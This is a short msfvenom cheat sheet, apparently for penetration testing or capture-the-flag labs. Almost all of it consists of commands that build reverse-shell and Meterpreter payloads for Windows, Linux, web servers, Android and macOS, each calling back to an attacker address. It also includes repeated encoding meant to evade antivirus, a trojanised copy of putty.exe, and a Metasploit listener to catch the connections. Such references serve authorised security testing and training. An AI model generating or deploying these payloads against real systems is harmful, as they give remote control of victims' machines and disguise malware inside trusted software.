MSFVenom combines msfpayload and msfencode for generating custom shellcode and payloads.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell32.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f dll -o shell.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f powershell -o shell.ps1
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.1 LPORT=443 -f exe -o shell_https.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell_plain.exe
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o shell.elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o shell32.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o shell64.elf && chmod +x shell64.elf
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw -o shell.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw -o shell.jsp
msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f war -o shell.war
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f aspx -o shell.aspx
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw -o shell.py
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -o shell.apk
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f macho -o shell.macho
msfvenom -l encoders
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -e x64/xor_dynamic -i 10 -f exe -o encoded.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw | msfvenom -a x64 --platform windows -e x64/xor_dynamic -i 5 -f exe -o double_encoded.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -x /usr/share/windows-binaries/putty.exe -o evil_putty.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 --smallest -f exe -o small.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.1 && set LPORT 4444 && run -j